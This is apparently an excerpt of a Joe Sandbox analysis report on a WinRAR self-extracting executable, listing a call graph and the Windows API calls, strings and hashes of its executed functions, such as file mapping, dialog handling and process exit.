24744->24961 24746 73e12a DeleteObject 24748 73e146 24746->24748 24749 73e13f DeleteObject 24746->24749 24747->24746 24750 73e177 24748->24750 24753 73e189 24748->24753 24749->24748 24962 73dc3b 6 API calls 24750->24962 24752 73e17d CloseHandle 24752->24753 24958 73ac7c 24753->24958 24755 73e1c3 24760 73f993 GetModuleHandleW 24755->24760 25092 747cd5 24756->25092 24759->24675 24760->24684 24761->24686 24762->24689 24763->24664 24765->24693 24778 743b07 24766->24778 24769 742a67 24769->24695 24771 742a6f 24772 742a7a 24771->24772 24792 743b43 DeleteCriticalSection 24771->24792 24772->24695 24821 74c05a 24774->24821 24777 742a7d 7 API calls 2 library calls 24777->24700 24780 743b10 24778->24780 24781 743b39 24780->24781 24782 742a63 24780->24782 24793 743d46 24780->24793 24798 743b43 DeleteCriticalSection 24781->24798 24782->24769 24784 742b8c 24782->24784 24814 743c57 24784->24814 24788 742baf 24789 742bbc 24788->24789 24820 742bbf 6 API calls ___vcrt_FlsFree 24788->24820 24789->24771 24791 742ba1 24791->24771 24792->24769 24799 743c0d 24793->24799 24796 743d7e InitializeCriticalSectionAndSpinCount 24797 743d69 24796->24797 24797->24780 24798->24782 24800 743c26 24799->24800 24803 743c4f 24799->24803 24800->24803 24806 743b72 24800->24806 24803->24796 24803->24797 24804 743c3b GetProcAddress 24804->24803 24805 743c49 24804->24805 24805->24803 24812 743b7e ___vcrt_FlsSetValue 24806->24812 24807 743b95 LoadLibraryExW 24809 743bb3 GetLastError 24807->24809 24810 743bfa 24807->24810 24808 743bf3 24808->24803 24808->24804 24809->24812 24810->24808 24811 743c02 FreeLibrary 24810->24811 24811->24808 24812->24807 24812->24808 24813 743bd5 LoadLibraryExW 24812->24813 24813->24810 24813->24812 24815 743c0d ___vcrt_FlsSetValue 5 API calls 24814->24815 24816 743c71 24815->24816 24817 743c8a TlsAlloc 24816->24817 24818 742b96 24816->24818 24818->24791 24819 743d08 6 API calls ___vcrt_FlsSetValue 24818->24819 24819->24788 24820->24791 24822 74c077 24821->24822 24825 74c073 24821->24825 24822->24825 24827 74a6a0 24822->24827 24823 73fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24824 73eefe 24823->24824 24824->24698 24824->24777 24825->24823 24828 74a6ac __FrameHandler3::FrameUnwindToState 24827->24828 24839 74ac31 EnterCriticalSection 24828->24839 24830 74a6b3 24840 74c528 24830->24840 24832 74a6c2 24833 74a6d1 24832->24833 24853 74a529 29 API calls 24832->24853 24855 74a6ed LeaveCriticalSection _abort 24833->24855 24836 74a6cc 24854 74a5df GetStdHandle GetFileType 24836->24854 24837 74a6e2 _abort 24837->24822 24839->24830 24841 74c534 __FrameHandler3::FrameUnwindToState 24840->24841 24842 74c541 24841->24842 24843 74c558 24841->24843 24864 7491a8 20 API calls __dosmaperr 24842->24864 24856 74ac31 EnterCriticalSection 24843->24856 24846 74c546 24865 749087 26 API calls ___std_exception_copy 24846->24865 24848 74c550 _abort 24848->24832 24849 74c590 24866 74c5b7 LeaveCriticalSection _abort 24849->24866 24851 74c564 24851->24849 24857 74c479 24851->24857 24853->24836 24854->24833 24855->24837 24856->24851 24858 74b136 _unexpected 20 API calls 24857->24858 24859 74c48b 24858->24859 24861 74af0a 11 API calls 24859->24861 24863 74c498 24859->24863 24860 748dcc _free 20 API calls 24862 74c4ea 24860->24862 24861->24859 24862->24851 24863->24860 24864->24846 24865->24848 24866->24848 24868 73ec50 24867->24868 24869 73086d GetModuleHandleW 24868->24869 24870 7308e7 24869->24870 24871 730888 GetProcAddress 24869->24871 24872 730c14 GetModuleFileNameW 24870->24872 24972 7475fb 42 API calls __vsnwprintf_l 24870->24972 24873 7308a1 24871->24873 24874 7308b9 GetProcAddress 24871->24874 24883 730c32 24872->24883 24873->24874 24876 7308cb 24874->24876 24876->24870 24877 730b54 24877->24872 24878 730b5f GetModuleFileNameW CreateFileW 24877->24878 24879 730c08 CloseHandle 24878->24879 24880 730b8f SetFilePointer 24878->24880 24879->24872 24880->24879 24881 730b9d ReadFile 24880->24881 24881->24879 24885 730bbb 24881->24885 24886 730c94 GetFileAttributesW 24883->24886 24888 730c5d CompareStringW 24883->24888 24889 730cac 24883->24889 24963 72b146 24883->24963 24966 73081b 24883->24966 24885->24879 24887 73081b 2 API calls 24885->24887 24886->24883 24886->24889 24887->24885 24888->24883 24890 730cb7 24889->24890 24893 730cec 24889->24893 24892 730cd0 GetFileAttributesW 24890->24892 24894 730ce8 24890->24894 24891 730dfb 24915 73a64d GetCurrentDirectoryW 24891->24915 24892->24890 24892->24894 24893->24891 24895 72b146 GetVersionExW 24893->24895 24894->24893 24896 730d06 24895->24896 24897 730d73 24896->24897 24898 730d0d 24896->24898 24899 724092 _swprintf 51 API calls 24897->24899 24900 73081b 2 API calls 24898->24900 24902 730d9b AllocConsole 24899->24902 24901 730d17 24900->24901 24903 73081b 2 API calls 24901->24903 24904 730df3 ExitProcess 24902->24904 24905 730da8 GetCurrentProcessId AttachConsole 24902->24905 24906 730d21 24903->24906 24973 743e13 24905->24973 24909 72e617 53 API calls 24906->24909 24908 730dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 24908->24904 24910 730d3c 24909->24910 24911 724092 _swprintf 51 API calls 24910->24911 24912 730d4f 24911->24912 24913 72e617 53 API calls 24912->24913 24914 730d5e 24913->24914 24914->24904 24915->24715 24917 73081b 2 API calls 24916->24917 24918 73ac2a OleInitialize 24917->24918 24919 73ac4d GdiplusStartup SHGetMalloc 24918->24919 24919->24717 24921 73c5ce 24920->24921 24922 73c6e4 24921->24922 24923 731fac CharUpperW 24921->24923 24975 72f3fa 82 API calls 2 library calls 24921->24975 24922->24726 24922->24727 24923->24921 24926 73ec50 24925->24926 24927 73dbeb SetEnvironmentVariableW 24926->24927 24929 73dc0e 24927->24929 24928 73dc36 24928->24719 24929->24928 24930 73dc2a SetEnvironmentVariableW 24929->24930 24930->24928 24932 73b70b GetObjectW 24931->24932 24933 73b6fe 24931->24933 24935 73b71a 24932->24935 24976 73a6c2 FindResourceW 24933->24976 24937 73a5c6 4 API calls 24935->24937 24938 73b72d 24937->24938 24939 73b770 24938->24939 24940 73b74c 24938->24940 24941 73a6c2 12 API calls 24938->24941 24950 72da42 24939->24950 24990 73a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24940->24990 24944 73b73d 24941->24944 24943 73b754 24991 73a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24943->24991 24944->24940 24946 73b743 DeleteObject 24944->24946 24946->24940 24947 73b75d 24992 73a80c 8 API calls 24947->24992 24949 73b764 DeleteObject 24949->24939 25001 72da67 24950->25001 24955 7390b7 24956 73eb38 8 API calls 24955->24956 24957 7390d6 24956->24957 24957->24739 24959 73acab GdiplusShutdown OleUninitialize 24958->24959 24959->24755 24961->24747 24962->24752 24964 72b196 24963->24964 24965 72b15a GetVersionExW 24963->24965 24964->24883 24965->24964 24967 73ec50 24966->24967 24968 730828 GetSystemDirectoryW 24967->24968 24969 73085e 24968->24969 24970 730840 24968->24970 24969->24883 24971 730851 LoadLibraryW 24970->24971 24971->24969 24972->24877 24974 743e1b 24973->24974 24974->24908 24974->24974 24975->24921 24977 73a6e5 SizeofResource 24976->24977 24978 73a7d3 24976->24978 24977->24978 24979 73a6fc LoadResource 24977->24979 24978->24932 24978->24935 24979->24978 24980 73a711 LockResource 24979->24980 24980->24978 24981 73a722 GlobalAlloc 24980->24981 24981->24978 24982 73a73d GlobalLock 24981->24982 24983 73a7cc GlobalFree 24982->24983 24984 73a74c __InternalCxxFrameHandler 24982->24984 24983->24978 24985 73a7c5 GlobalUnlock 24984->24985 24993 73a626 GdipAlloc 24984->24993 24985->24983 24988 73a7b0 24988->24985 24989 73a79a GdipCreateHBITMAPFromBitmap 24989->24988 24990->24943 24991->24947 24992->24949 24994 73a645 24993->24994 24995 73a638 24993->24995 24994->24985 24994->24988 24994->24989 24997 73a3b9 24995->24997 24998 73a3e1 GdipCreateBitmapFromStream 24997->24998 24999 73a3da GdipCreateBitmapFromStreamICM 24997->24999 25000 73a3e6 24998->25000 24999->25000 25000->24994 25002 72da75 _wcschr __EH_prolog 25001->25002 25003 72daa4 GetModuleFileNameW 25002->25003 25004 72dad5 25002->25004 25005 72dabe 25003->25005 25047 7298e0 25004->25047 25005->25004 25007 72db31 25058 746310 25007->25058 25008 72959a 80 API calls 25009 72da4e 25008->25009 25045 72e29e GetModuleHandleW FindResourceW 25009->25045 25011 72e261 78 API calls 25013 72db05 25011->25013 25012 72db44 25014 746310 26 API calls 25012->25014 25013->25007 25013->25011 25025 72dd4a 25013->25025 25022 72db56 ___vcrt_FlsSetValue 25014->25022 25015 72dc85 25015->25025 25078 729d70 81 API calls 25015->25078 25017 729e80 79 API calls 25017->25022 25019 72dc9f ___std_exception_copy 25020 729bd0 82 API calls 25019->25020 25019->25025 25023 72dcc8 ___std_exception_copy 25020->25023 25022->25015 25022->25017 25022->25025 25072 729bd0 25022->25072 25077 729d70 81 API calls 25022->25077 25023->25025 25042 72dcd3 ___vcrt_FlsSetValue _wcslen ___std_exception_copy 25023->25042 25079 731b84 MultiByteToWideChar 25023->25079 25025->25008 25026 72e159 25031 72e1de 25026->25031 25085 748cce 26 API calls ___std_exception_copy 25026->25085 25028 72e16e 25086 747625 26 API calls ___std_exception_copy 25028->25086 25030 72e214 25035 746310 26 API calls 25030->25035 25031->25030 25034 72e261 78 API calls 25031->25034 25033 72e1c6 25087 72e27c 78 API calls 25033->25087 25034->25031 25037 72e22d 25035->25037 25038 746310 26 API calls 25037->25038 25038->25025 25040 731da7 WideCharToMultiByte 25040->25042 25042->25025 25042->25026 25042->25040 25080 72e5b1 50 API calls __vsnprintf 25042->25080 25081 746159 26 API calls 3 library calls 25042->25081 25082 748cce 26 API calls ___std_exception_copy 25042->25082 25083 747625 26 API calls ___std_exception_copy 25042->25083 25084 72e27c 78 API calls 25042->25084 25046 72da55 25045->25046 25046->24955 25048 7298ea 25047->25048 25049 72994b CreateFileW 25048->25049 25050 72996c GetLastError 25049->25050 25054 7299bb 25049->25054 25051 72bb03 GetCurrentDirectoryW 25050->25051 25052 72998c 25051->25052 25053 729990 CreateFileW GetLastError 25052->25053 25052->25054 25053->25054 25056 7299b5 25053->25056 25055 7299ff 25054->25055 25057 7299e5 SetFileTime 25054->25057 25055->25013 25056->25054 25057->25055 25059 746349 25058->25059 25060 74634d 25059->25060 25071 746375 25059->25071 25088 7491a8 20 API calls __dosmaperr 25060->25088 25062 746699 25064 73fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25062->25064 25063 746352 25089 749087 26 API calls ___std_exception_copy 25063->25089 25066 7466a6 25064->25066 25066->25012 25067 74635d 25068 73fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25067->25068 25069 746369 25068->25069 25069->25012 25071->25062 25090 746230 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25071->25090 25073 729be3 25072->25073 25074 729bdc 25072->25074 25073->25074 25076 729785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25073->25076 25091 726d1a 77 API calls 25073->25091 25074->25022 25076->25073 25077->25022 25078->25019 25079->25042 25080->25042 25081->25042 25082->25042 25083->25042 25084->25042 25085->25028 25086->25033 25087->25031 25088->25063 25089->25067 25090->25071 25091->25073 25093 747ce1 _unexpected 25092->25093 25094 747ce8 25093->25094 25095 747cfa 25093->25095 25128 747e2f GetModuleHandleW 25094->25128 25116 74ac31 EnterCriticalSection 25095->25116 25098 747ced 25098->25095 25129 747e73 GetModuleHandleExW 25098->25129 25099 747d9f 25117 747ddf 25099->25117 25102 747d01 25102->25099 25104 747d76 25102->25104 25137 7487e0 20 API calls _abort 25102->25137 25108 747d8e 25104->25108 25113 748a91 _abort 5 API calls 25104->25113 25106 747dbc 25120 747dee 25106->25120 25107 747de8 25138 752390 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25107->25138 25109 748a91 _abort 5 API calls 25108->25109 25109->25099 25113->25108 25116->25102 25139 74ac81 LeaveCriticalSection 25117->25139 25119 747db8 25119->25106 25119->25107 25140 74b076 25120->25140 25123 747e1c 25126 747e73 _abort 8 API calls 25123->25126 25124 747dfc GetPEB 25124->25123 25125 747e0c GetCurrentProcess TerminateProcess 25124->25125 25125->25123 25127 747e24 ExitProcess 25126->25127 25128->25098 25130 747ec0 25129->25130 25131 747e9d GetProcAddress 25129->25131 25133 747ec6 FreeLibrary 25130->25133 25134 747ecf 25130->25134 25132 747eb2 25131->25132 25132->25130 25133->25134 25135 73fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25134->25135 25136 747cf9 25135->25136 25136->25095 25137->25104 25139->25119 25141 74b09b 25140->25141 25145 74b091 25140->25145 25142 74ac98 _unexpected 5 API calls 25141->25142 25142->25145 25143 73fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25144 747df8 25143->25144 25144->25123 25144->25124 25145->25143 25351 73b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 25392 731bbd GetCPInfo IsDBCSLeadByte 25323 73dca1 DialogBoxParamW 25393 73f3a0 27 API calls 25326 74a4a0 71 API calls _free 25353 73eda7 48 API calls _unexpected 25327 7508a0 IsProcessorFeaturePresent 25394 726faa 111 API calls 3 library calls 25329 74b49d 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25355 739580 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 25372 73c793 102 API calls 5 library calls 25331 73c793 97 API calls 4 library calls 25357 73b18d 78 API calls

                                                                                              Executed Functions

                                                                                              Function 0073DF1E Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 195filesleeptimeCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 00730863: GetModuleHandleW.KERNEL32(kernel32), ref: 0073087C
                                                                                                • Part of subcall function 00730863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0073088E
                                                                                                • Part of subcall function 00730863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 007308BF
                                                                                                • Part of subcall function 0073A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0073A655
                                                                                                • Part of subcall function 0073AC16: OleInitialize.OLE32(00000000), ref: 0073AC2F
                                                                                                • Part of subcall function 0073AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0073AC66
                                                                                                • Part of subcall function 0073AC16: SHGetMalloc.SHELL32(00768438), ref: 0073AC70
                                                                                              • GetCommandLineW.KERNEL32 ref: 0073DF5C
                                                                                              • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0073DF83
                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0073DF94
                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0073DFCE
                                                                                                • Part of subcall function 0073DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0073DBF4
                                                                                                • Part of subcall function 0073DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0073DC30
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0073DFD7
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,0077EC90,00000800), ref: 0073DFF2
                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxname,0077EC90), ref: 0073DFFE
                                                                                              • GetLocalTime.KERNEL32(?), ref: 0073E009
                                                                                              • _swprintf.LIBCMT ref: 0073E048
                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0073E05A
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0073E061
                                                                                              • LoadIconW.USER32(00000000,00000064), ref: 0073E078
                                                                                              • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0073E0C9
                                                                                              • Sleep.KERNEL32(?), ref: 0073E0F7
                                                                                              • DeleteObject.GDI32 ref: 0073E130
                                                                                              • DeleteObject.GDI32(?), ref: 0073E140
                                                                                              • CloseHandle.KERNEL32 ref: 0073E183
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\AppData\Local\Temp\RarSFX1$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xzw
                                                                                              • API String ID: 3049964643-1494992444
                                                                                              • Opcode ID: 38b9e1b5b99c2aa10d6d58227e466c714dcb22da63b213656e4eca8409837d02
                                                                                              • Instruction ID: 3ce6a7dfe6a05c42f689bcca66617a72c1c8ef81e3049b9d98c8ab100d90662c
                                                                                              • Opcode Fuzzy Hash: 38b9e1b5b99c2aa10d6d58227e466c714dcb22da63b213656e4eca8409837d02
                                                                                              • Instruction Fuzzy Hash: 1A61F871504349AFE720AF74AC4DF6B7BACEB04781F048429F94A921E2DBBC9D44C766
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0072A69B Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1032 72a69b-72a6bf call 73ec50 1035 72a6c1-72a6ce FindFirstFileW 1032->1035 1036 72a727-72a730 FindNextFileW 1032->1036 1037 72a742-72a7ff call 730602 call 72c310 call 7315da * 3 1035->1037 1039 72a6d0-72a6e2 call 72bb03 1035->1039 1036->1037 1038 72a732-72a740 GetLastError 1036->1038 1043 72a804-72a811 1037->1043 1040 72a719-72a722 1038->1040 1047 72a6e4-72a6fc FindFirstFileW 1039->1047 1048 72a6fe-72a707 GetLastError 1039->1048 1040->1043 1047->1037 1047->1048 1050 72a717 1048->1050 1051 72a709-72a70c 1048->1051 1050->1040 1051->1050 1053 72a70e-72a711 1051->1053 1053->1050 1055 72a713-72a715 1053->1055 1055->1040
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0072A592,000000FF,?,?), ref: 0072A6C4
                                                                                                • Part of subcall function 0072BB03: _wcslen.LIBCMT ref: 0072BB27
                                                                                              • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0072A592,000000FF,?,?), ref: 0072A6F2
                                                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0072A592,000000FF,?,?), ref: 0072A6FE
                                                                                              • FindNextFileW.KERNEL32(?,?,?,?,?,?,0072A592,000000FF,?,?), ref: 0072A728
                                                                                              • GetLastError.KERNEL32(?,?,?,?,0072A592,000000FF,?,?), ref: 0072A734
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 42610566-0
                                                                                              • Opcode ID: 1b0a1501be424608ded7f985deeb666a314e078ae768f6b6fb4ace685d82ef4d
                                                                                              • Instruction ID: de6ccd0a550585c47d3b77673c22e88016b2180b870af1ae5651ac60ffc59e41
                                                                                              • Opcode Fuzzy Hash: 1b0a1501be424608ded7f985deeb666a314e078ae768f6b6fb4ace685d82ef4d
                                                                                              • Instruction Fuzzy Hash: B2419272500225EBCB25DF68DC88AEAF7B8FB48350F104196E56EE3240D7386E90CF94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00747DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000000,?,00747DC4,00000000,0075C300,0000000C,00747F1B,00000000,00000002,00000000), ref: 00747E0F
                                                                                              • TerminateProcess.KERNEL32(00000000,?,00747DC4,00000000,0075C300,0000000C,00747F1B,00000000,00000002,00000000), ref: 00747E16
                                                                                              • ExitProcess.KERNEL32 ref: 00747E28
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 1703294689-0
                                                                                              • Opcode ID: ab95eb1e0a21fe26154e0d5de2f5e74ecfe6e776d01a8c56bc3ae22836c1c081
                                                                                              • Instruction ID: 872434054aed0b400523c31108c371dc0ef3df88f67564a4444e4fabbfc99b5d
                                                                                              • Opcode Fuzzy Hash: ab95eb1e0a21fe26154e0d5de2f5e74ecfe6e776d01a8c56bc3ae22836c1c081
                                                                                              • Instruction Fuzzy Hash: A2E04631000648EBCF066F20CD0DA8A3F6AEB00382B008594F8098B132CB7EDE52CA84
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0072848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 7aa18e5d5fb513f584b896f1b3503c15446c87fb96b63ad97d5fc8c762c9fb7e
                                                                                              • Instruction ID: 78e3264be0b5a8df96321a11d434ea08955e716e561a5b72cec62b00196629d8
                                                                                              • Opcode Fuzzy Hash: 7aa18e5d5fb513f584b896f1b3503c15446c87fb96b63ad97d5fc8c762c9fb7e
                                                                                              • Instruction Fuzzy Hash: 0C824E70905165EEDF65CF64D885BFAB7B9BF05300F0C41B9E8499B243CB3A5A88C761
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073B7E0 Relevance: 109.2, APIs: 48, Strings: 14, Instructions: 731windowfilesleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 0073B7E5
                                                                                                • Part of subcall function 00721316: GetDlgItem.USER32(00000000,00003021), ref: 0072135A
                                                                                                • Part of subcall function 00721316: SetWindowTextW.USER32(00000000,007535F4), ref: 00721370
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0073B8D1
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0073B8EF
                                                                                              • IsDialogMessageW.USER32(?,?), ref: 0073B902
                                                                                              • TranslateMessage.USER32(?), ref: 0073B910
                                                                                              • DispatchMessageW.USER32(?), ref: 0073B91A
                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0073B93D
                                                                                              • EndDialog.USER32(?,00000001), ref: 0073B960
                                                                                              • GetDlgItem.USER32(?,00000068), ref: 0073B983
                                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0073B99E
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,007535F4), ref: 0073B9B1
                                                                                                • Part of subcall function 0073D453: _wcschr.LIBVCRUNTIME ref: 0073D45C
                                                                                                • Part of subcall function 0073D453: _wcslen.LIBCMT ref: 0073D47D
                                                                                              • SetFocus.USER32(00000000), ref: 0073B9B8
                                                                                              • _swprintf.LIBCMT ref: 0073BA24
                                                                                                • Part of subcall function 00724092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007240A5
                                                                                                • Part of subcall function 0073D4D4: GetDlgItem.USER32(00000068,0077FCB8), ref: 0073D4E8
                                                                                                • Part of subcall function 0073D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0073AF07,00000001,?,?,0073B7B9,0075506C,0077FCB8,0077FCB8,00001000,00000000,00000000), ref: 0073D510
                                                                                                • Part of subcall function 0073D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0073D51B
                                                                                                • Part of subcall function 0073D4D4: SendMessageW.USER32(00000000,000000C2,00000000,007535F4), ref: 0073D529
                                                                                                • Part of subcall function 0073D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0073D53F
                                                                                                • Part of subcall function 0073D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0073D559
                                                                                                • Part of subcall function 0073D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0073D59D
                                                                                                • Part of subcall function 0073D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0073D5AB
                                                                                                • Part of subcall function 0073D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0073D5BA
                                                                                                • Part of subcall function 0073D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0073D5E1
                                                                                                • Part of subcall function 0073D4D4: SendMessageW.USER32(00000000,000000C2,00000000,007543F4), ref: 0073D5F0
                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0073BA68
                                                                                              • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0073BA90
                                                                                              • GetTickCount.KERNEL32 ref: 0073BAAE
                                                                                              • _swprintf.LIBCMT ref: 0073BAC2
                                                                                              • GetLastError.KERNEL32(?,00000011), ref: 0073BAF4
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0073BB43
                                                                                              • _swprintf.LIBCMT ref: 0073BB7C
                                                                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0073BBD0
                                                                                              • GetCommandLineW.KERNEL32 ref: 0073BBEA
                                                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0073BC47
                                                                                              • ShellExecuteExW.SHELL32(0000003C), ref: 0073BC6F
